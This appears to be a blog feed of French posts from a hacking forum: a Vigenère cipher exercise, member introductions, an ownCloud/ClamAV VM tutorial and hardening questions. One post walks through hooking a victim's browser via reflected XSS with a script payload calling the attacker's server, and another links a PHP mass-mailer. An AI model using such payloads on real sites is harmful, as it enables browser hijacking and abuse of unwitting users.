    char  alphabet10[26] = {'K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','A','B','C','D','E','F','G','H','I','J',0};
    char  alphabet11[26] = {'L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','A','B','C','D','E','F','G','H','I','J','K',0};
    char  alphabet12[26] = {'M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','A','B','C','D','E','F','G','H','I','J','K','L',0};
    char  alphabet13[26] = {'N','O','P','Q','R','S','T','U','V','W','X','Y','Z','A','B','C','D','E','F','G','H','I','J','K','L','M',0};
    char  alphabet14[26] = {'O','P','Q','R','S','T','U','V','W','X','Y','Z','A','B','C','D','E','F','G','H','I','J','K','L','M','N',0};
    char  alphabet15[26] = {'P','Q','R','S','T','U','V','W','X','Y','Z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O',0};
    char  alphabet16[26] = {'Q','R','S','T','U','V','W','X','Y','Z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P',0};
    char  alphabet17[26] = {'R','S','T','U','V','W','X','Y','Z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q',0};
    char  alphabet18[26] = {'S','T','U','V','W','X','Y','Z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R',0};
    char  alphabet19[26] = {'T','U','V','W','X','Y','Z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S',0};
    char  alphabet20[26] = {'U','V','W','X','Y','Z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T',0};
    char  alphabet21[26] = {'V','W','X','Y','Z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U',0};
    char  alphabet22[26] = {'W','X','Y','Z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V',0};
    char  alphabet23[26] = {'X','Y','Z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W',0};
    char  alphabet24[26] = {'Y','Z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X',0};
    char  alphabet25[26] = {'Z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y',0};

    printf("%s",inUpperCase("rouge"));


    return 0;
}

Le code n'est surement pas optimisé cependant c'est une bonne base pour commencé.

Le principe du chiffre de Vigenère est le suivant :

Vous avez 26 alphabets différents sachant qu'elles suivent une même logique, chaque alphabet est décalée de une lettre par rapport à

la précédente, c'est tout se qu'il faudra retenir.

Il faudra ensuite choisir un mot clé, secret. Prenons par exemple le mot "salut".

Il faudra ensuite choisir le message à chiffré, prenons "Bonjour".

Voici le fonctionnement du chiffre de Vigenère :

________________________
SALUTSALUT
Bonjour

SALUTSALUTSALUTSALUTSALUT
Bonjour comment vas tu
_________________________

Nous écrivons le mot secret autant de fois que nécessaire au-dessus du texte à crypté jusqu'à se qu'il n'y est plus de lettre du message à

crypté sans une autre au-dessus. Ici nous devrons donc écrire deux fois "salut" pour "couvrir" le message "bonjour".

Ensuite, il faudra aller chercher dans le Carré de Vigenère (nom que l'on donne à la représentation des 26 alphabets) le chiffrement à

appliqué à la lettre, la première lettre à chiffrée est "b", et la lettre du mot secret qui lui correspond est S, nous allons donc dans le

carré de Vigenère à l'alphabet qui commencera par S, vous pouvez trouver un carré de Vigenère facilement sur Google.

Lorsque vous avez repéré cet alphabet, prenez le "b" de l'alphabet en clair( l'alphabet non décalé) et regarder à quoi il correspond.

Notre "b" correspond à un "T". Faisons de même pour la deuxième lettre "o", la lettre du mot secret qui lui correspond est "A", ici vous

l'aurez compris la lettre ne changera pas. Passons maintenant à la troisième lettre "n", la lettre du mot secret lui correspondant est "L",

On va donc chercher l'alphabet qui commencera par "L" dans le carré de Vigenère, lorsqu'on a trouvé cet alphabet, prenez le "n" de

l'alphabet en clair, et regardez à quoi il correspond dans l'alphabet commençant par "L", le "n" correspond à "Y" dans l'alphabet

qui commence par "L".

Au final on obtiendra le message crypté suivant : TOYDHMR pour le message : "bonjour"

Le code que j'ai joint au poste n'est qu'une partie du code final, il permet juste de répondre aux deux questions qui me préoccupées le plus,

Faut-il générer les tables ou directement les inclures dans le programme ?

Comment doit-on traiter le cas où l'utilisateur n'entre pas un mot clé en majuscule ?

Il faudra ajouter à ce code une interface pour l'utilisateur, la génération du message crypté et vos propres améliorations !


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1ProRJ8
via IFTTT

samedi 16 mai 2015

Présentation Seven7

Pseudo : Seven7
Connaissances informatiques générales : Etant donné que je suis étudiant en première année, j'ai acquis pour le moment des connaissances en language python qui sont très faible, en HTML, CSS, Javascript et aussi le SEO. Les bases de données avec SQL Oracle, l'architecture générale d'un ordinateur. Et également des connaissances en réseau. Bien que l'énumération de cette liste soit longues, je n'ai que des notions en chacun de ces domaines. Je ne suis spécialiste de rien .... Pour le moment ;)

Connaissances en hacking : En hacking j'ai que des connaissances théoriques, j'ai eu très rarement l'occasion de pratiquer. Mais je connais les injections SQL. Les différents types de virus et d'attaques. Metasploit que je connais que de nom, je sais à quoi ça sert mais je l'ai jamais utilisé.

Système d'exploitation principal : Windows 7 Professionel 64 bits

Je viens sur ce forum pour : Approfondir mes connaissances en hacking et en développement.

J'ai connu ce forum via : Moteur de recherche Google

Informations supplémentaires (job, intérêts, autres...) : Comme je l'ai dis plus haut je suis étudiant en première année à SUPINFO, la sécurité informatique c'est révéler comme une passion. C'est vraiment le domaine le plus intéressant, selon moi, de l'informatique qui mêle, protection, intrusion et en même temps recherche sur l'amélioration des technologies actuelle pour protéger nos données. Je connais rapidement l'histoire du hacking, de ses grands pontes au virus les plus marquants de l'histoire numérique. Sinon dans mon temps libre j'aime, comme tout jeune de mon âge sortir avec mes amis, autour d'une table de billard c'est toujours mieux. Récemment j'ai commencé le jeu de rôle sur Roll20, pour ceux qui connaissent.

J'espère que ma présentation vous aura plu ! ;)
Peace.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1PqC2tR
via IFTTT

vendredi 15 mai 2015

IPviking, qu'est ce donc ?

Salut,

On m'a parlé du site http://ift.tt/1nJSXJw
On me l'a présenté comme une visualisation en direct des attaques internet, j'ai un peu de mal à y croire, mais surtout je ne trouve pas beaucoup d'infos la dessus.

Qu'en dites vous ?


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1B27NNX
via IFTTT

[Présentation] Daniel

Hello les amis! Je me présente, Daniel. Surnommez-moi Dany ;)
Je me suis inscris il y a quelques heures, et depuis j'ai visité quelques topics. J'ai voulu inaugurer mon nombre de replys par ce sujet ;)
Connaissances informatiques générales : ahah, difficile a dire...
Je ne suis pas un gros bidouilleur, mais niveau Android j'assure...
Connaissances en hacking : aucune. C'est pour cela que je me suis inscris :D
Système d'exploitation principal : Windows (oui je sais c'est mal)
Mais sinon objectivement mon OS principal reste Android :)
Je viens sur ce forum pour : apprendre, échanger, demander des conseils, bref profiter de ce merveilleux forum.
J'ai connu ce forum via : korben... Désolé je fais de la pub (en fait j'insinue dans votre esprit que si je suis korben, c'est que je m'intéresse a la technologie...)
Informations supplémentaires (job, intérêts, autres...) : en gros j'ai 16 ans, je suis en fin d'année de seconde, je cherche a passer le bac S SI, et ma seconde passion est la magie. (Ma troisième passion est l'aéronautique...)

Voilà, j'espère de tout mon coeur être admis en tant que membre de cette nouvelle famille que je vais bientôt connaitre :)

PS: si vous avez des topics a me filer par ou je pourrais commencer, parce que la...


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1B1OFjh
via IFTTT

mercredi 13 mai 2015

Smartphone du parfait hacker ?

Bonjour,
-1- J'envisage d'étudier la partie mobile/smartphone, et pour commencer par en acheter un.
Quel est le smartphone rapport qualité/prix idéal pour faire des tests de hacking ?
Genre système d'exploitation le plus répandu ? etc...

Cordialement,
Igor


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1PjqNmU
via IFTTT

Tableaux et pointeurs

Bonjour à tous,

Une petite question à propos du code suivant :

Code:

#include <stdlib.h>
#include <stdio.h>


int main(int argc, char **argv)
{
  int tab[] = {1,2,3};

  printf("L'adresse de tab est : %p\n", &tab);
  printf("La valeur de tab est : %p\n", tab);
  printf("L'adresse de la premiere case du tableau est : %p\n\n", &tab[0]);
    return 0;
}

C.png

Est-il normale que la variable "tab" pointe sur sa même adresse, sachant que tab pointe aussi sur le début du tableau.

De plus, lorsque qu'on lance un "scanf" sur "&tab", le compilateur émet un warning alors que d'après les résultats du code ci-dessus,

on a exactement la même adresse ?
Images jointes


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1ECJGXL
via IFTTT

mardi 12 mai 2015

Présentation de Soran

Pseudo (+autres si plusieurs) : Soran
Connaissances informatiques générales : Hardware/Software
Connaissances en hacking : Limité aux sites internets
Système d'exploitation principal : Windows/Kali Linux
Je viens sur ce forum pour : En découvrir bien plus sur la sécurité informatique, son fonctionnement, ses barrières et ses moyens de les contourner
J'ai connu ce forum via : Google (moteur de recherche peu connu)
Informations supplémentaires (job, intérêts, autres...) :
Téléconseiller GDF SUEZ Dolce Vita, trike drifteur, Fan de jeux vidéos et de technologies en général.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1IzNUEp
via IFTTT

Présentation xav

Bien le bonjour, passage obligé je trouve quand on s'inscrit sur un forum, voilà mon entrée :

Pseudo (+autres si plusieurs) :

xav

Connaissances informatiques générales :

Je suis technicien d'assistance chez un éditeur de logiciel, donc je pratique au quotidien. Mis à part la partie consacrée au logiciel que l'on édite, je suis amené à intervenir sur tous systèmes Windows (XP, Vista, 7, 8.1, 2003 server, 2008 server, 2012 server, CE) pour des installations, paramétrages et dépannages. Mon poste comprend également la gestion de l'antivirus que l'on fournit (support utilisateurs et support interne), le matériel (scanners, imprimantes, douchettes, terminaux d'inventaire, lecteurs de cartes à puce, robots-automates), télétravail (logiciels de PMAD, bureau à distance et remote app), et d'autres joyeuseries... Sinon pour le perso, je pratique Linux sur une Debian et Kali Linux.

Connaissances en hacking :

Elles sont limitées et anciennes... J'ai pu joué par le passé avec les robot de mots de passe perdus de compte de messagerie, un peu de wifi avec BackTrack et Kali, j'ai touché un tout petit peu le changements de mots de passe sous windows avec live cd.

Système d'exploitation principal :

HP 800 G1 USDT sous WIndows 8.1 Pro au boulot, tour montée sous Windows 7 Pro à la maison et portable Asus X71V sous Debian.

Je viens sur ce forum pour :

Me perfectionner, qui me servira professionnellement et personnellement.

J'ai connu ce forum via :

En étudiant flash sous Debian je suis arrivé sur un tuto de hack de webcam à distance, et je suis arrivé dans ce monde qui semble merveilleux (mais pourquoi je ne l'ai pas connu plus tôt ?)

Informations supplémentaires (job, intérêts, autres...) :

Job j'en ai déjà parlé. Quand je ne travaille pas je roule à moto, grand fan de Valentino Rossi !!

Voilà, j'espère prendre dans un premier temps et partager par la suite, contribuer à l'entraide, surtout lors des loooooongues soirées d'hiver (barbecues et hack ne font pas bons ménages...).

xav #46


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1PgNnN5
via IFTTT

Présentation SwSetup

Pseudo : SwSetup
Connaissances informatiques générales : HTML, Wordpress, Hardware, Création de site web
Connaissances en hacking : Aucune !
Système d'exploitation principal : Windows
Je viens sur ce forum pour : Commencer et apprendre les bases.
J'ai connu ce forum via : Un ami
Informations supplémentaires : Sport

Merci à vous !


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1RAfKEx
via IFTTT

lundi 11 mai 2015

Tutoriel [Demande de tuto] IMSI catcher

Je recherche un tutoriel pemettant de comprendre les mécanisme hardware la programmation utilisé par un IMSI catcher. Ainsi un tutoriel permettant de monter son propre IMSI catcher ainsi que de trouver une protection contre ce genre d'outil.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1PdEKTE
via IFTTT

Clé USB Infection et perte de données

Bonjour,

Depuis peu les ordinateur de mon lycée sont totalement envahis par des logiciels style Trojan.
Comme je suis l'option Informatique et Science du Numérique je suis obligé de transporter mes documents via clé USB, mais le problème est que chaque fois que je branche ma clé sur un ordinateur du lycée puis sur le mien, je récupère toutes les merdes... Ou du moins une partie, je doute qu'AVAST sois à 100% efficace...
J'ai donc le choix entre vous demander de l'aide ou bien ramener mon pc portable en cours pour une seule matière.
Le problème est que le logiciel (trojan) transforme certains fichier txt ou .html en .ink (raccourcis). J'ai dois donc réinstaller à chaque fois la version portable de sublime text...
Biensûr je possède une sauvegarde des fichiers importants mais dans le doute...

J'avais déjà entendu parler des infections entière de réseau de lycée par un ami et les possibilités assez effroyables qui s'offraient à la personne s'étant introduite dans le réseau...


Si cela peut vous être utile il ne transforme que les fichiers à la racine même de la clé, et n'agit pas dans les dossiers.

Merci d'avance,
Ephemeral.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1PBJjBQ
via IFTTT

samedi 9 mai 2015

image satellite

Hellow tout le monde ;)

Depuis quelques temps je me posais la question: est si il était possible de voir ce qui ce passe en direct précisément dans un endroit quelconque par images satellite ?

N'ayant pas trouvé de réponse a ma question je me tourne a vous et si oui cela serais sympa de donner le lien même par mp :)

Je sais déjà que skybox imaging le fais mais seulement pour les entreprises :v

Voilà sur ce bonne soirée/ journée et a peluche :D


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1EY30kt
via IFTTT

Nocivité des ondes électromagnétiques sur la génétique et la neurobiologie humaine

Voici la conclusion de conclusions issues de 1800 études menées sur ce sujet.

http://ift.tt/1PwSDai

(en anglais)


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1PwSBzd
via IFTTT

mardi 5 mai 2015

Présentation _Zero

Pseudo (+autres si plusieurs) : Zero
Connaissances informatiques générales : C, C++
Connaissances en hacking : Pas grand chose
Système d'exploitation principal : manjaro
Je viens sur ce forum pour : apprendre!
J'ai connu ce forum via : google


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1IKKjnc
via IFTTT

dimanche 3 mai 2015

Votre propre Cloud personnel sur machine virtuelle dédiée avec VirtualBox

Préambule

Ce tutoriel vient comme une suite de celui-ci à propos de la virtualisation de vos services à l'aide de VirtualBox.
Je me servirai donc de la machine virtuelle déjà créée comme d'une base à ce tutoriel.

But à atteindre
Notre but dans ce tutoriel sera de créer une machine virtuelle vous permettant d'opérer des transferts de fichiers via le réseau.
Cela peut en effet vous permettre de recevoir ces fichiers dans un environnement cloisonné et donc (au cas ou ces fichiers sont infectés) de ne pas mettre en péril votre système hôte.
L'envoi par le réseau a également l'avantage de ne pas nécessiter de connexion de stick USB inconnu (et contenant peut être du code malicieux) sur votre machine.

Mode opératoire
Nous allons :
  1. Installer et configurer owncloud
  2. Installer et configurer un serveur FTP
  3. Installer un anti virus (afin de vérifier les fichiers reçus)
  4. Créer quelques scripts utilitaires


OwnCloud

OwnCloud, Késako ?
Owncloud est une application Web permettant de créer votre propre service de Cloud (comme Dropbox ou Google Drive).
Il vous permet ainsi de créer et de gérer des utilisateurs ayant chacun son espace privé sur votre serveur.

Pourquoi installer owncloud
Dans notre solution, owncloud sera une solution facile pour déposer (et récupérer) des fichiers sur notre machine virtuelle.
Vous pourrez donc ainsi vous connecter sur le owncloud de cette machine virtuelle afin de déposer des fichiers que vos amis pourront retrouver en se connectant via le même utilisateur.


Création de la base de données
Dans le dernier tutoriel, nous avons installé Apache et MySQL.
Ces outils sont nécessaires pour owncloud. Cependant, afin de faciliter la gestion de notre base de données MySQL, nous allons également installer phpmyadmin.

Pour ce faire connecter vous en root et taper les commandes suivantes:
Code:

aptitude install phpmyadmin
A l'installation, sélectionnez Apache2 comme serveur Web.
Accepter également la création de la base de données de PHPMyAdmin avec dConfig puis suivez ce processus.

Nous devons maintenant faire le lien entre PHPMyAdmin et Apache.
Pour ce faire et toujours en root, exécuter les commandes suivante :
Code:

cd /var/www/html
ln -s /usr/share/phpmyadmin/ phpmyadmin

Rendez-vous maintenant (sinon je tire :P) sur votre browser préféré de votre machine physique et essayez l'URL suivante :
localhost:8888/phpmyadmin

Si vous obtenez une erreur, ajoutez la ligne suivante à votre php.ini
extension=mysqli.so
Explication complète
Redémarrez ensuite Apache (service apache2 restart)

Vous devriez maintenant accéder à phpmyadmin.
Connectez vous en tant que root

Rendez vous dans l'onglet Users et complétez comme suit :

Attention n'oubliez pas de cocher la checkbox concernant la création d'une DB pour cet utilisateur.

Allez sur Go dans le fond de la page.

Vous devriez donc maintenant avoir une base de données pour votre owncloud.

Installation

Nous allons maintenant télécharger et installer owncloud.

Pour ce faire, tapez les commandes suivantes :
Code:

wget http://ift.tt/1K1kddS
tar -jxvf owncloud-8.0.3.tar.bz2
mv owncloud/ /var/www/html/
chown www-data.www-data -R /var/www/html/owncloud/

Rendez vous maintenant sur votre navigateur favoris de votre machine physique.
Accède l'URL suivante : localhost:8888/owncloud

Si vous obtenez une erreur tel que :
PHP is configured to populate raw post data. Since PHP 5.6 this will lead to PHP throwing notices for perfectly valid code.
To fix this issue set always_populate_raw_post_data to -1 in your php.ini

Décommentez la ligne :
always_populate_raw_post_data = -1
Dans votre PHP.ini puis redémarrez Apache

Au terme de cette installation vous devriez obtenir l'écran suivant dans le navigateur de votre machine hôte :

Configuration de owncloud
Complétez l'écran précédent tel que :

Ne vous trompez pas dans les informations de connexion à votre base de données !

Vous devriez alors accéder à votre owncloud.

En haut à droite, il existe un menu déroulant portant votre nom, cliquez dessus et accédez à la page users.

Dans cette page vous aurez accès à un bouton "Create" permettant de créer un nouvel utilisateur.
C'est à cet utilisateur que toutes les personnes voulant partager des fichiers avec nous auront accès.
Choisissez donc un nom d'utilisateur et un mot de passe puis enregistrer.

Déconnectez vous et testez la connexion via ce nouvel utilisateur.

Disponibilité de la VM
Dans la section suivante, nous allons ajouter un serveur FTP à notre machine virtuelle.
Cependant, FTP n'aime pas beaucoup être natté. De ce fait nous allons changer le mode réseau de notre machine virtuelle en Bridge.
De ce fait, elle sera reconnue comme une machine normale sur votre réseau.

Rendez vous dans la configuration de votre machine virtuelle sur VirtualBox et, dans l'onglet réseau, changez le mode de connexion de NAT en Bridge (choisissez l'interface qui vous convient).
Cette opération nécessite que la machine virtuelle soit éteinte.

Une fois la machine virtuelle redémarrée, repérez son adresse ip via la commande ifconfig.

Cependant, après cette opération faite :
  • Le port d'accès HTTP sera 80 et plus 8888
  • Le port SSH sera 22 et plus 2222
  • L'IP ne sera plus localhost
  • L'accès à owncloud se fera via : IP_VM/owncloud
  • L'accès à owncloud ne sera plus possible


En effet, owncloud enregistre les @IPs pouvant y accéder, nous allons donc devoir supprimer une règle pour que vous puissiez de nouveau avoir accès à votre owncloud.

Pour ce faire exécutez les commandes suivantes :
Code:

vim /var/www/html/owncloud/config/config.php
Supprimez alors toutes les lignes se situant entre la ligne commençant par 'secret' et la ligne commençant par 'datadirectory'.

Relancez apache2 puis essayez à nouveau d'accéder à votre owncloud via :
IP_VM/owncloud

Conclusion de l'installation
Vous disposez maintenant d'un espace d'échange vous permettant d'échanger des fichiers via le réseau.
Chacun d'entre vous pourra en effet accéder à votre owncloud (via le second compte que nous avons créé) afin d'y déposer ou d'y prendre des fichiers.

Afin que vos connaissances puissent accéder à votre owncloud, vous devrez cependant leur donner l'adresse IP de votre machine virtuelle.
Cette dernière peut très aisément se trouver via la commande ifconfig.

Sachez également que owncloud permet la création de dossiers de partages entre les différents utilisateurs, je vous laisse le loisir d'explorer cette solution si elle vous intéresse.

Après l'installation de notre serveur FTP et de notre antivirus, nous créerons quelques scripts permettant d'accèder aux fichiers de owncloud via FTP.

ProFTPd
Nous allons maintenant installer un serveur FTP basique.
Celui-ci nous permettra de pouvoir déposer et accéder des fichiers via ce protocole.

Pour ce faire, connectez vous en root à votre machine virtuelle et exécuter la commande suivante :
Code:

aptitude install proftpd
Lors de l'installation, il vous est demandé si vous souhaitez lancez proftpd comme un service indépendant ou via inetd. Dans notre cas, et pour faciliter les choses, nous l'installerons comme un service indépendant.

Ajout d'un utilisateur FTP
Afin de permettre le dépôt de fichiers via FTP, nous allons créer un nouvel utilisateur sur votre VM Linux, tapez donc la commande suivante :
Code:

adduser nomUser
Complétez alors les informations.

Ouvrez ensuite votre programme de FTP sur votre machine hôte et essayez de vous connecter avec l'utilisateur créé sur la machine virtuelle.
Vous devriez avoir accès aux fichiers de cet utilisateur et également avoir la possibilité d'en ajouter de nouveaux.
N'oubliez pas que vous devez vous connecter via l'@IP de la machine virtuelle.

Clamav
Clamav est un anti virus disponible sur Linux et permettant de vérifier si un fichier est infecté ou non.
Dans notre cas, il nous servira à vérifier si les fichiers reçu sont infectés avant de les transférer vers notre machine hôte.

Installation
Comme d'habitude sur linux, l'installation est très complexe :
Code:

aptitude install clamav
Après installation j'ai eu un souci d'utilisation de la commande freshclam, si vous l'avez aussi exécuter la commande suivante :
Code:

rm -r /var/log/clamav/freshclam.log
Utilisation
Pour utiliser clamav, il faut 2 commandes :
  1. clamscan qui scanne un ou plusieurs fichiers
  2. freshclam qui met à jour la base de données antivirale (la base virale VPS a été mise à jour :p )


Voici un exemple d'un scan de dossier avec clamav :
Code:

clamscan -rv /home/ --move /tmp
L'option move déplace les fichiers infectés vers /tmp

Quelques optimisations/scripts
Dans cette section, nous allons faire quelques scripts permettant de rendre cette VM plus facilement utilisable.
Nous allons donc :
  • Créer un script qui copie les données de notre user owncloud vers un user FTP
  • Créer un script qui analyse (antivirus) automatiquement le dossier /home et le dossier de owncloud
  • Créer un crontab qui met à jour l'antivirus en automatique


Owncloud --> FTP
Ce script permettra que les données copiées par un utilisateur sur owncloud puissent être accessible également via FTP.
Le dépôt pourra ainsi se faire via owncloud tandis que la récupération se fait en FTP.

Il s'agira ainsi d'une seconde méthode pour récupérer les fichiers sur votre machine virtuelle et ce via le protocole FTP.

Pour ce faire, nous devons créer un nouvel utilisateur Linux (afin de pouvoir y accéder via ftp), appelons le owncloud.
Code:

adduser owncloud
Ecrivons maintenant le script qui ne sera en fait composé que d'une seule commande, la commande rsync.

Commençons par l'installer :
Code:

aptitude install rsync
Voici le script :
Code:

#!/bin/bash
rsync -arv --delete /var/www/html/owncloud/data/user/files/* /home/owncloud/

Sauvegardez le sous le nom que vous souhaitez puis enregistrer le dans le crontab afin qu'il s'exécute toutes les 2 minutes (pour ne pas devoir attendre trop longtemps).
Rendez- le exécutable :
Code:

chmod +x ftp.sh
Voici le code pour l'ajouter dans le crontab :
Code:

crontab -e
Puis ajouter la ligne suivante :
Code:

*/2 * * * * /root/ftp.sh
Analyse antivirale
Encore un script qui ne fera que deux lignes :
Code:

#!/bin/bash
clamscan -rv /home --move /tmp
clamscan -rv /var/www/html/owncloud/data

N'oubliez pas de le rendre exécutable.
Ce script ne sera pas ajouté dans le crontab, il devra être exécuté à la main avant le transfert vers la machine physique.

Mise à jour de la base virale
Ce script n'exécutera que la commande freshclam

Le voici donc :
Code:

#!/bin/bash
freshclam

Rendez le exécutable puis ajouter le dans le crontab :
Code:

crontab -e
Code:

* */2 * * * /root/majantivir.sh
Conclusion
Nous avons aujourd'hui appris à créer une machine virtuelle vous permettant de sécuriser vos transfert de fichiers.

Vous avez maintenant votre propre cloud avec les identifiants mot de passe que vous avez créé.
N'oubliez pas que grâce à nos scripts vous avez également la possibilité de récupérer les fichiers du cloud via FTP !

J'espère que cet exemple vous incitera à aller vers la virtualisation de vos services. Cette solution a beaucoup d'avantages y compris au point de vue de la sécurité.
En effet, si cette machine venait à être compromise, vous pourriez simplement recharger un état précédent non compromis. De plus, une machine virtuelle compromise a de très faible chance d'infecter la machine hôte.

Cette VM peut encore être améliorée.
Par exemple, nous pourrions :
  • Améliorer le script d'analyse antivirale afin de n'afficher que les fichiers infectés
  • Créer des système d'utilisateurs virtuels sur le FTP
  • Faire un change root des users en FTP
  • Passer own cloud en https
  • ...


Elle est cependant une bonne base, libre à vous de l'améliorer.

Si vous avez d'autres idées d'améliorations n'hésitez pas à m'en faire part.
Je suis également disponible pour toute question.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1GTwCTK
via IFTTT

samedi 2 mai 2015

XSS Shell - XSS Tunnel

Bonsoir à tous ! Ça fait un moment que je traine ici et je n'ai encore jamais rien posté, rien à dire d'intéressant qui n'est pas déjà été dit surement...
Alors j'ai découvert une utilisation assez surprenante des failles XSS (reflected pour ce cas), ça existe depuis quelques années mais je n'en avais jamais entendu parlé...
Pour moi une faille XSS sert juste a afficher un vieux alert('coucou') dans le browser de la cible ou au pire le renvoyer vers un script php voleur de cookies, mais en fait, non...

J'ai donc un ami blogueur qui a une faille xss dans son search.php (classique). En cherchant bien je suis tombé sur : XSS Shell



On installe et configure XSS Shell (que l'on trouve ici : http://ift.tt/1FGT9kY)

C'est du .asp donc hosting sur IIS.

Une fois configuré, on envoi l'url à la victime (exemple : http://ift.tt/1DLeRyl'http://monserveur.com'</script>

La cible est donc connecté a xssshell et on peut lui envoyer tout un tas de requêtes prédéfinies ou tout ce qu'on veut du moment que ça soit en JavaScript.

Le seul problême c'est que quand la cible quitte son browser ou ferme l'onglet, la connexion est perdue.

C'est la qu'entre en jeu XSS Tunnel :



Ce petit soft se connecte au serveur et utilise la cible comme proxy, la connexion est maintenue même si la cible change de domaine :)

J'en suis encore à essayer de faire fonctionner XSS Tunnel, je n'apparait pas en tant que client, je pige pas trop pourquoi, bref...

En tout cas c'est vraiment très intéressant, si quelqu'un a déjà utiliser cette "technique" ou s'y connait un peu ça m’intéresserais d'avoir quelques retours ou avis ^^

Bonne soirée !


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1DLeOCO
via IFTTT

Présentation Nadysa

Pseudo : Nadysa
Connaissances informatiques générales : ...
Connaissances en hacking : Pas grand chose
Système d'exploitation principal : W8.1
Je viens sur ce forum pour : Apprendre
J'ai connu ce forum via : Google


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1QXMVBD
via IFTTT

Que mettre en place en plus ?

Bonjour,

Je dispose d'un serveur dédié et je souhaite savoir comment je peux faire mieux. Voici ce que je mettrai :

- VPN (4048bits) pour les tâches administratif. (OpenVPN)
- No root SSH. (Config SSH)
- Accepter seulement certaine clef SSH en 4048bits.
- Bloquer les attaques brute force (fail2ban)
- Accès SSH via double authentification et seulement en localhost. (google authentification)
- Supprimer les informations que pourrai donner Apache/Nignx. (config Apache/Nginx)
- Supprimer les scanner de ports telle que nmap. (portsentry)
- Analyseur de backdoor (Rkhunter )
- Mettre un firewall (iptable)

Donc pour ce connecter au SSH il faut être connecter au VPN sinon sa ne marchera pas.

Sur la couche réseau vous avez une meilleur idée ?


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1AsOj4Y
via IFTTT

Présentation : Aseyku

Pseudo: Aseyku

Connaissances informatiques générales : HTML, CSS ...

Connaissances en hacking : Web

Système d'exploitation principal : W7

Je viens sur ce forum pour : Apprendre

J'ai connu ce forum via : Un autre fofo qui a fermé aujourd'hui. :)

Informations supplémentaires (job, intérêts, autres...) : Aucun Job.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1bop90J
via IFTTT

vendredi 1 mai 2015

Nouveaux PHP Mailer Priv8

Nouveaux PHP Mailer Priv8

Bonjour

Aujourd'hui, je vais vous donner un nouveau look PHP Mailer Priv8 et je vous conseille d'expérimenter avec de nouvelles fonctionnalités

Capture_d_cran_2015_04_30_16_03_02.jpg

Le lien de téléchargement gratuit ici: http://ift.tt/1PaxGBQ
Images jointes


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1GNrPDi
via IFTTT

BackTrack

Bonjour a tous,

j'aimerai savoir où je pourrai telecharger BackTrack si uelqu'un a un lien car toutles site que je retrouve me redirige vers kali.org

merci a+


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1bl6HpD
via IFTTT